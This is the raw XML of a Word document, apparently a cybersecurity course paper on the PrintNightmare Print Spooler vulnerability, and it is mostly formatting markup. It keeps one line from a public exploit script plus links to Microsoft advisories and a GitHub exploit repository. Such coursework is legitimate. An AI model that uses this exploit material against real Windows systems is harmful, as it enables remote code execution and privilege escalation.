    </w:p>
    <w:p w14:paraId="1289824E" w14:textId="4F6E97B4" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="005A0B58">
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">    main(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>dce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>pDriverPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>options.share</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005A0B58" w:rsidRPr="00C449AB">
      <w:footerReference w:type="default" r:id="rId4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5666" w14:textId="77777777" w:rsidR="00FA2FCB" w:rsidRDefault="00FA2FCB" w:rsidP="00D928C9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="030109FF" w14:textId="77777777" w:rsidR="00FA2FCB" w:rsidRDefault="00FA2FCB" w:rsidP="00D9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70770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FB3213" w14:textId="548E7781" w:rsidR="00D928C9" w:rsidRDefault="00D928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72AB37" w14:textId="77777777" w:rsidR="00D928C9" w:rsidRDefault="00D92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BD39" w14:textId="77777777" w:rsidR="00FA2FCB" w:rsidRDefault="00FA2FCB" w:rsidP="00D928C9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="19BFF571" w14:textId="77777777" w:rsidR="00FA2FCB" w:rsidRDefault="00FA2FCB" w:rsidP="00D92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5EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8EC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34D9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="371240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26B28"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78E2E4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46F44"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9F7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6291E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3DB8333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93B38"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D56EE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24BE8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9318AD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E2724"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6674FF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24964"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A6FA2FF6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6E5246"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="26501B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220D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B75824FC"/>
    <w:lvl w:ilvl="0" w:tplc="73EE06D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94ACD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A27A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E7025"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3CD8BB7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4E1DB7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="795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65F68"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7B8A4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C681B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="339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82B7A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3EB8A7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46EC9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C76AA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E13FE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="784203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40173"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA681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8589F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="922C38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42612"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="97F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027AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E8B062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5A3C38"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C6A42A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A1120"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3920D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E30EBB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8B7216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D46DFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="816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731019">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="211768601">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="241986266">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1620136704">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1273320207">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="499271316">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="521865225">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="770316046">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="923992100">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1319922482">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2015767397">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="2029326385">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="975526380">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1548250661">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1042095805">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1951351186">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1319772036">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="339162208">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="595869024">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="575936076">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1431320255">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="554775499">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="925382235">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1409186368">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1459566996">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="184559731">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="3258677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FD"/>
    <w:rsid w:val="0000012D"/>
    <w:rsid w:val="00007D36"/>
    <w:rsid w:val="00011986"/>
    <w:rsid w:val="00013AA5"/>
    <w:rsid w:val="000160A0"/>
    <w:rsid w:val="00016647"/>
    <w:rsid w:val="00037EB6"/>
    <w:rsid w:val="000402B6"/>
    <w:rsid w:val="00052EBC"/>
    <w:rsid w:val="000601FC"/>
    <w:rsid w:val="000611C7"/>
    <w:rsid w:val="000642EB"/>
    <w:rsid w:val="00070BAD"/>
    <w:rsid w:val="00071667"/>
    <w:rsid w:val="0007644C"/>
    <w:rsid w:val="00082831"/>
    <w:rsid w:val="00087C7F"/>
    <w:rsid w:val="00093C4E"/>
    <w:rsid w:val="000A5380"/>
    <w:rsid w:val="000A6F34"/>
    <w:rsid w:val="000B6674"/>
    <w:rsid w:val="000C59F5"/>
    <w:rsid w:val="000C6856"/>
    <w:rsid w:val="000D0D2E"/>
    <w:rsid w:val="000D1A73"/>
    <w:rsid w:val="000D45D1"/>
    <w:rsid w:val="000E2951"/>
    <w:rsid w:val="000F0107"/>
    <w:rsid w:val="000F149A"/>
    <w:rsid w:val="000F4638"/>
    <w:rsid w:val="000F649B"/>
    <w:rsid w:val="001014A8"/>
    <w:rsid w:val="00103599"/>
    <w:rsid w:val="00121915"/>
    <w:rsid w:val="001368EC"/>
    <w:rsid w:val="00143508"/>
    <w:rsid w:val="00144543"/>
    <w:rsid w:val="00150AF4"/>
    <w:rsid w:val="001532C3"/>
    <w:rsid w:val="0016089C"/>
    <w:rsid w:val="001653C3"/>
    <w:rsid w:val="001669C5"/>
    <w:rsid w:val="00192C31"/>
    <w:rsid w:val="001A2EB3"/>
    <w:rsid w:val="001A31A8"/>
    <w:rsid w:val="001A6EE9"/>
    <w:rsid w:val="001B253D"/>
    <w:rsid w:val="001C424C"/>
    <w:rsid w:val="001C5B4D"/>
    <w:rsid w:val="001D051D"/>
    <w:rsid w:val="001D09B9"/>
    <w:rsid w:val="001E176B"/>
    <w:rsid w:val="001E273C"/>
    <w:rsid w:val="001E3225"/>
    <w:rsid w:val="001E55D4"/>
    <w:rsid w:val="001E6ABD"/>
    <w:rsid w:val="001F29CD"/>
    <w:rsid w:val="001F5416"/>
    <w:rsid w:val="001F7418"/>
    <w:rsid w:val="00206FFA"/>
    <w:rsid w:val="00215AB0"/>
    <w:rsid w:val="002216DA"/>
    <w:rsid w:val="00226A8B"/>
    <w:rsid w:val="00236623"/>
    <w:rsid w:val="00245EF1"/>
    <w:rsid w:val="00250D62"/>
    <w:rsid w:val="00253D2F"/>
    <w:rsid w:val="00273AAD"/>
    <w:rsid w:val="00275B00"/>
    <w:rsid w:val="0028360B"/>
    <w:rsid w:val="002A1FDA"/>
    <w:rsid w:val="002A3A12"/>
    <w:rsid w:val="002B084B"/>
    <w:rsid w:val="002B0AA5"/>
    <w:rsid w:val="002B2221"/>
    <w:rsid w:val="002B3AF9"/>
    <w:rsid w:val="002B7DE1"/>
    <w:rsid w:val="002D0469"/>
    <w:rsid w:val="002E6B60"/>
    <w:rsid w:val="002E6FFE"/>
    <w:rsid w:val="002F1558"/>
    <w:rsid w:val="002F160B"/>
    <w:rsid w:val="002F235A"/>
    <w:rsid w:val="003042E0"/>
    <w:rsid w:val="003179C7"/>
    <w:rsid w:val="003211BD"/>
    <w:rsid w:val="00325421"/>
    <w:rsid w:val="0033059A"/>
    <w:rsid w:val="0034019B"/>
    <w:rsid w:val="0034307C"/>
    <w:rsid w:val="003448EC"/>
    <w:rsid w:val="00347494"/>
    <w:rsid w:val="00351FFB"/>
    <w:rsid w:val="00361F5F"/>
    <w:rsid w:val="0037526F"/>
    <w:rsid w:val="00375E76"/>
    <w:rsid w:val="00382F5D"/>
    <w:rsid w:val="0038487F"/>
    <w:rsid w:val="00390534"/>
    <w:rsid w:val="00390884"/>
    <w:rsid w:val="00393500"/>
    <w:rsid w:val="003A6A9D"/>
    <w:rsid w:val="003D2959"/>
    <w:rsid w:val="003D69A8"/>
    <w:rsid w:val="003E644E"/>
    <w:rsid w:val="003F63C4"/>
    <w:rsid w:val="00403203"/>
    <w:rsid w:val="00403681"/>
    <w:rsid w:val="00405FD3"/>
    <w:rsid w:val="00414E54"/>
    <w:rsid w:val="00415A1E"/>
    <w:rsid w:val="004163C9"/>
    <w:rsid w:val="00422CAC"/>
    <w:rsid w:val="004276EB"/>
    <w:rsid w:val="00433383"/>
    <w:rsid w:val="00434436"/>
    <w:rsid w:val="00441FE9"/>
    <w:rsid w:val="004647A4"/>
    <w:rsid w:val="00476012"/>
    <w:rsid w:val="00487135"/>
    <w:rsid w:val="00493468"/>
    <w:rsid w:val="004A4D60"/>
    <w:rsid w:val="004A5E95"/>
    <w:rsid w:val="004B095A"/>
    <w:rsid w:val="004B3EC6"/>
    <w:rsid w:val="004B74CB"/>
    <w:rsid w:val="004C1EA5"/>
    <w:rsid w:val="004C2AB0"/>
    <w:rsid w:val="004D4CDA"/>
    <w:rsid w:val="004D661D"/>
    <w:rsid w:val="004F0E14"/>
    <w:rsid w:val="004F1E43"/>
    <w:rsid w:val="004F4BD3"/>
    <w:rsid w:val="00500503"/>
    <w:rsid w:val="0050792A"/>
    <w:rsid w:val="00507EA1"/>
    <w:rsid w:val="00513420"/>
    <w:rsid w:val="005202C9"/>
    <w:rsid w:val="005212B9"/>
    <w:rsid w:val="00527CE0"/>
    <w:rsid w:val="0053347A"/>
    <w:rsid w:val="005540D4"/>
    <w:rsid w:val="00560E6E"/>
    <w:rsid w:val="005610A0"/>
    <w:rsid w:val="00564BC8"/>
    <w:rsid w:val="00583405"/>
    <w:rsid w:val="005A0B58"/>
    <w:rsid w:val="005A1953"/>
    <w:rsid w:val="005A1BA5"/>
    <w:rsid w:val="005B0BD4"/>
    <w:rsid w:val="005B3C7C"/>
    <w:rsid w:val="005B41F8"/>
    <w:rsid w:val="005C3C51"/>
    <w:rsid w:val="005C61FC"/>
    <w:rsid w:val="005D0C9E"/>
    <w:rsid w:val="005D3DF3"/>
    <w:rsid w:val="005D510A"/>
    <w:rsid w:val="005F20CC"/>
    <w:rsid w:val="005F50EA"/>
    <w:rsid w:val="006005D9"/>
    <w:rsid w:val="0060359E"/>
    <w:rsid w:val="006065F2"/>
    <w:rsid w:val="00625216"/>
    <w:rsid w:val="00637B20"/>
    <w:rsid w:val="00644C62"/>
    <w:rsid w:val="0064748E"/>
    <w:rsid w:val="00654737"/>
    <w:rsid w:val="00657A01"/>
    <w:rsid w:val="00660D43"/>
    <w:rsid w:val="006656E5"/>
    <w:rsid w:val="00672FFF"/>
    <w:rsid w:val="0067641D"/>
    <w:rsid w:val="00685C0A"/>
    <w:rsid w:val="006937ED"/>
    <w:rsid w:val="00695D27"/>
    <w:rsid w:val="006A70DE"/>
    <w:rsid w:val="006B3DAD"/>
    <w:rsid w:val="006C2018"/>
    <w:rsid w:val="006C4952"/>
    <w:rsid w:val="006C5C59"/>
    <w:rsid w:val="006C6020"/>
    <w:rsid w:val="006C6345"/>
    <w:rsid w:val="006E452C"/>
    <w:rsid w:val="006F02D7"/>
    <w:rsid w:val="006F12E2"/>
    <w:rsid w:val="00702FA3"/>
    <w:rsid w:val="0071175E"/>
    <w:rsid w:val="0071301D"/>
    <w:rsid w:val="007171B5"/>
    <w:rsid w:val="007211A9"/>
    <w:rsid w:val="00735EF7"/>
    <w:rsid w:val="007364A2"/>
    <w:rsid w:val="007405D5"/>
    <w:rsid w:val="0074089B"/>
    <w:rsid w:val="00742D12"/>
    <w:rsid w:val="00743FBC"/>
    <w:rsid w:val="00746E35"/>
    <w:rsid w:val="0075029B"/>
    <w:rsid w:val="00752C9A"/>
    <w:rsid w:val="00763581"/>
    <w:rsid w:val="00764523"/>
    <w:rsid w:val="00764767"/>
    <w:rsid w:val="00764C7C"/>
    <w:rsid w:val="0076746B"/>
    <w:rsid w:val="00771F58"/>
    <w:rsid w:val="00774A5A"/>
    <w:rsid w:val="00777B99"/>
    <w:rsid w:val="00784499"/>
    <w:rsid w:val="00790C7E"/>
    <w:rsid w:val="00792594"/>
    <w:rsid w:val="007A3F7F"/>
    <w:rsid w:val="007A5BEB"/>
    <w:rsid w:val="007A5F2F"/>
    <w:rsid w:val="007B3F95"/>
    <w:rsid w:val="007B7ECD"/>
    <w:rsid w:val="007C1579"/>
    <w:rsid w:val="007C6184"/>
    <w:rsid w:val="007D3A67"/>
    <w:rsid w:val="007F196E"/>
    <w:rsid w:val="007F2A89"/>
    <w:rsid w:val="0080237F"/>
    <w:rsid w:val="00807B0E"/>
    <w:rsid w:val="00824A03"/>
    <w:rsid w:val="00836856"/>
    <w:rsid w:val="00837D5F"/>
    <w:rsid w:val="00854129"/>
    <w:rsid w:val="008740BB"/>
    <w:rsid w:val="00882F43"/>
    <w:rsid w:val="0088689B"/>
    <w:rsid w:val="00891223"/>
    <w:rsid w:val="00895FA4"/>
    <w:rsid w:val="00896D8A"/>
    <w:rsid w:val="008A1232"/>
    <w:rsid w:val="008A20A0"/>
    <w:rsid w:val="008B1C45"/>
    <w:rsid w:val="008D28EC"/>
    <w:rsid w:val="008D6831"/>
    <w:rsid w:val="008E588A"/>
    <w:rsid w:val="008F5144"/>
    <w:rsid w:val="009018E7"/>
    <w:rsid w:val="00902206"/>
    <w:rsid w:val="00907391"/>
    <w:rsid w:val="00914831"/>
    <w:rsid w:val="00917F67"/>
    <w:rsid w:val="00922C2C"/>
    <w:rsid w:val="00923766"/>
    <w:rsid w:val="00924917"/>
    <w:rsid w:val="00931D8E"/>
    <w:rsid w:val="00932B12"/>
    <w:rsid w:val="00933711"/>
    <w:rsid w:val="00933953"/>
    <w:rsid w:val="00934C8B"/>
    <w:rsid w:val="00940EEF"/>
    <w:rsid w:val="00943A5C"/>
    <w:rsid w:val="00947D95"/>
    <w:rsid w:val="00951700"/>
    <w:rsid w:val="0096531F"/>
    <w:rsid w:val="00966FAC"/>
    <w:rsid w:val="00967B2B"/>
    <w:rsid w:val="00971A02"/>
    <w:rsid w:val="009733AE"/>
    <w:rsid w:val="00977679"/>
    <w:rsid w:val="009807FF"/>
    <w:rsid w:val="009823E5"/>
    <w:rsid w:val="009A2DE8"/>
    <w:rsid w:val="009B0252"/>
    <w:rsid w:val="009C16BE"/>
    <w:rsid w:val="009C1A68"/>
    <w:rsid w:val="009D5404"/>
    <w:rsid w:val="009F0D36"/>
    <w:rsid w:val="009F16B6"/>
    <w:rsid w:val="00A00A2A"/>
    <w:rsid w:val="00A0181F"/>
    <w:rsid w:val="00A03397"/>
    <w:rsid w:val="00A137F9"/>
    <w:rsid w:val="00A271A9"/>
    <w:rsid w:val="00A31C95"/>
    <w:rsid w:val="00A41E75"/>
    <w:rsid w:val="00A51C8A"/>
    <w:rsid w:val="00A72E38"/>
    <w:rsid w:val="00A75E72"/>
    <w:rsid w:val="00A8404E"/>
    <w:rsid w:val="00A856B5"/>
    <w:rsid w:val="00A931FF"/>
    <w:rsid w:val="00A95D3D"/>
    <w:rsid w:val="00AA64DA"/>
    <w:rsid w:val="00AA67AC"/>
    <w:rsid w:val="00AB131C"/>
    <w:rsid w:val="00AB3973"/>
    <w:rsid w:val="00AB6923"/>
    <w:rsid w:val="00AC04B6"/>
    <w:rsid w:val="00AC5649"/>
    <w:rsid w:val="00AD129C"/>
    <w:rsid w:val="00AD4CDA"/>
    <w:rsid w:val="00AE577A"/>
    <w:rsid w:val="00AE5CB4"/>
    <w:rsid w:val="00AF33CD"/>
    <w:rsid w:val="00AF43A6"/>
    <w:rsid w:val="00AF5559"/>
    <w:rsid w:val="00B01DCF"/>
    <w:rsid w:val="00B07857"/>
    <w:rsid w:val="00B2437F"/>
    <w:rsid w:val="00B27423"/>
    <w:rsid w:val="00B27D05"/>
    <w:rsid w:val="00B35AFB"/>
    <w:rsid w:val="00B3689F"/>
    <w:rsid w:val="00B40B20"/>
    <w:rsid w:val="00B47DA4"/>
    <w:rsid w:val="00B54A2C"/>
    <w:rsid w:val="00B71C75"/>
    <w:rsid w:val="00B95252"/>
    <w:rsid w:val="00B96E3F"/>
    <w:rsid w:val="00BA32CD"/>
    <w:rsid w:val="00BA4154"/>
    <w:rsid w:val="00BA4E61"/>
    <w:rsid w:val="00BB0F38"/>
    <w:rsid w:val="00BC31E8"/>
    <w:rsid w:val="00BC7AEC"/>
    <w:rsid w:val="00BD32E3"/>
    <w:rsid w:val="00BD36E2"/>
    <w:rsid w:val="00BE2091"/>
    <w:rsid w:val="00BF7FA7"/>
    <w:rsid w:val="00C0088F"/>
    <w:rsid w:val="00C065FE"/>
    <w:rsid w:val="00C12027"/>
    <w:rsid w:val="00C1703E"/>
    <w:rsid w:val="00C204C0"/>
    <w:rsid w:val="00C216D6"/>
    <w:rsid w:val="00C24632"/>
    <w:rsid w:val="00C32925"/>
    <w:rsid w:val="00C351F7"/>
    <w:rsid w:val="00C408E8"/>
    <w:rsid w:val="00C449AB"/>
    <w:rsid w:val="00C467C9"/>
    <w:rsid w:val="00C536EA"/>
    <w:rsid w:val="00C560F9"/>
    <w:rsid w:val="00C5764E"/>
    <w:rsid w:val="00C652CA"/>
    <w:rsid w:val="00C65635"/>
    <w:rsid w:val="00C71FF1"/>
    <w:rsid w:val="00C77073"/>
    <w:rsid w:val="00C776A0"/>
    <w:rsid w:val="00C80E2A"/>
    <w:rsid w:val="00C82FFD"/>
    <w:rsid w:val="00C95A40"/>
    <w:rsid w:val="00C96669"/>
    <w:rsid w:val="00C97CCA"/>
    <w:rsid w:val="00CA18F1"/>
    <w:rsid w:val="00CA2599"/>
    <w:rsid w:val="00CB0A14"/>
    <w:rsid w:val="00CB2E30"/>
    <w:rsid w:val="00CB5208"/>
    <w:rsid w:val="00CB6621"/>
    <w:rsid w:val="00CC0D90"/>
    <w:rsid w:val="00CC3945"/>
    <w:rsid w:val="00CC7D93"/>
    <w:rsid w:val="00CD7C43"/>
    <w:rsid w:val="00CE7716"/>
    <w:rsid w:val="00CF59D6"/>
    <w:rsid w:val="00D2675F"/>
    <w:rsid w:val="00D35276"/>
    <w:rsid w:val="00D3635B"/>
    <w:rsid w:val="00D36CC4"/>
    <w:rsid w:val="00D43162"/>
    <w:rsid w:val="00D52686"/>
    <w:rsid w:val="00D549B6"/>
    <w:rsid w:val="00D554DF"/>
    <w:rsid w:val="00D60D46"/>
    <w:rsid w:val="00D6273B"/>
    <w:rsid w:val="00D677BE"/>
    <w:rsid w:val="00D86139"/>
    <w:rsid w:val="00D8678B"/>
    <w:rsid w:val="00D928C9"/>
    <w:rsid w:val="00DA26B3"/>
    <w:rsid w:val="00DA4555"/>
    <w:rsid w:val="00DB02BB"/>
    <w:rsid w:val="00DB40D2"/>
    <w:rsid w:val="00DB67BD"/>
    <w:rsid w:val="00DB7734"/>
    <w:rsid w:val="00DC070F"/>
    <w:rsid w:val="00DC1932"/>
    <w:rsid w:val="00DD3254"/>
    <w:rsid w:val="00DD3F58"/>
    <w:rsid w:val="00DE1E0E"/>
    <w:rsid w:val="00DE4C3C"/>
    <w:rsid w:val="00DF5497"/>
    <w:rsid w:val="00E06159"/>
    <w:rsid w:val="00E12ECB"/>
    <w:rsid w:val="00E2219D"/>
    <w:rsid w:val="00E24BE7"/>
    <w:rsid w:val="00E431E9"/>
    <w:rsid w:val="00E67772"/>
    <w:rsid w:val="00E77A44"/>
    <w:rsid w:val="00E77B75"/>
    <w:rsid w:val="00E9651F"/>
    <w:rsid w:val="00E96B85"/>
    <w:rsid w:val="00EA2109"/>
    <w:rsid w:val="00EA46D2"/>
    <w:rsid w:val="00EB2717"/>
    <w:rsid w:val="00EB41AE"/>
    <w:rsid w:val="00EB5595"/>
    <w:rsid w:val="00EC266C"/>
    <w:rsid w:val="00EC3173"/>
    <w:rsid w:val="00EC4133"/>
    <w:rsid w:val="00EC7059"/>
    <w:rsid w:val="00ED6182"/>
    <w:rsid w:val="00ED68A2"/>
    <w:rsid w:val="00EF1CC8"/>
    <w:rsid w:val="00EF5EC6"/>
    <w:rsid w:val="00EF5EC8"/>
    <w:rsid w:val="00F063C5"/>
    <w:rsid w:val="00F33770"/>
    <w:rsid w:val="00F43863"/>
    <w:rsid w:val="00F46C71"/>
    <w:rsid w:val="00F5707D"/>
    <w:rsid w:val="00F63D6A"/>
    <w:rsid w:val="00F75502"/>
    <w:rsid w:val="00F85022"/>
    <w:rsid w:val="00F953A6"/>
    <w:rsid w:val="00FA04AA"/>
    <w:rsid w:val="00FA2AFA"/>
    <w:rsid w:val="00FA2FCB"/>
    <w:rsid w:val="00FA400A"/>
    <w:rsid w:val="00FA49AE"/>
    <w:rsid w:val="00FC279C"/>
    <w:rsid w:val="00FC3D9D"/>
    <w:rsid w:val="00FC5074"/>
    <w:rsid w:val="00FE22D4"/>
    <w:rsid w:val="00FE2A78"/>
    <w:rsid w:val="00FE4311"/>
    <w:rsid w:val="00FF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4AA5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{85B00D3C-54AF-4234-9EB1-83187DE2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F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6F34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C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C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8C9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D92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8C9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000E29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29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9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2951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BA4154"/>
    <w:pPr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4154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E43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hyperlink" Target="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cube0x0/CVE-2021-1675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hyperlink" Target="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675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msrc.microsoft.com/update-guide/en-US/advisory/CVE-2021-34527" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.papercut.com/blog/print_basics/windows-print-nightmare-explained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hyperlink" Target="https://www.cybereason.com/blog/research/threat-alert-printnightmare-critical-vulnerability-in-windows-print-spooler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cube0x0/CVE-2021-1675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hyperlink" Target="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2021-34527" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cube0x0/CVE-2021-1675" TargetMode="External"/><Relationship Id="rId51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github.com/cube0x0/CVE-2021-1675" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cube0x0" TargetMode="External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D7BEC51098490F9CA8363FE45D9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DBD2C-AC71-4958-B53B-046713484EB5}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="006F5836" w:rsidRDefault="00670569" w:rsidP="00670569">
          <w:pPr>
            <w:pStyle w:val="37D7BEC51098490F9CA8363FE45D9529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E37C868B0B6422DA9C1D9451575D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89F1B-9FEA-4EC9-AD0C-A5D98F95C237}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="006F5836" w:rsidRDefault="00670569" w:rsidP="00670569">
          <w:pPr>
            <w:pStyle w:val="BE37C868B0B6422DA9C1D9451575D411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EFE59554DB2C46569F60137BAFCB6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B4F60-9CE4-4291-99DE-997B27B5B1EB}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="006F5836" w:rsidRDefault="00670569" w:rsidP="00670569">
          <w:pPr>
            <w:pStyle w:val="EFE59554DB2C46569F60137BAFCB6F10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  <w:docPart>
      <w:docPartPr>
        <w:name w:val="88FF36ACD6834B5388618DB88B666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0891A-1DAB-4F3A-B877-E19AD2DC5C18}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="006F5836" w:rsidRDefault="00670569" w:rsidP="00670569">
          <w:pPr>
            <w:pStyle w:val="88FF36ACD6834B5388618DB88B66678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9"/>
    <w:rsid w:val="0034019B"/>
    <w:rsid w:val="004F1E43"/>
    <w:rsid w:val="00670569"/>
    <w:rsid w:val="006B45E0"/>
    <w:rsid w:val="006F5836"/>
    <w:rsid w:val="009D30D7"/>
    <w:rsid w:val="009F0D36"/>
    <w:rsid w:val="00E2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D7BEC51098490F9CA8363FE45D9529">
    <w:name w:val="37D7BEC51098490F9CA8363FE45D9529"/>
    <w:rsid w:val="00670569"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BE37C868B0B6422DA9C1D9451575D411">
    <w:name w:val="BE37C868B0B6422DA9C1D9451575D411"/>
    <w:rsid w:val="00670569"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="EFE59554DB2C46569F60137BAFCB6F10">
    <w:name w:val="EFE59554DB2C46569F60137BAFCB6F10"/>
    <w:rsid w:val="00670569"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="88FF36ACD6834B5388618DB88B66678F">
    <w:name w:val="88FF36ACD6834B5388618DB88B66678F"/>
    <w:rsid w:val="006705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23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CYBR 3020 E01</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/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CYBR 3020 E01</dc:title>
  <dc:subject>Clayton Amelia</dc:subject>
  <dc:creator>Group ?</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ARR PERSONAL ACOUNT</cp:lastModifiedBy>
  <cp:revision>438</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-20T05:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-21T18:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>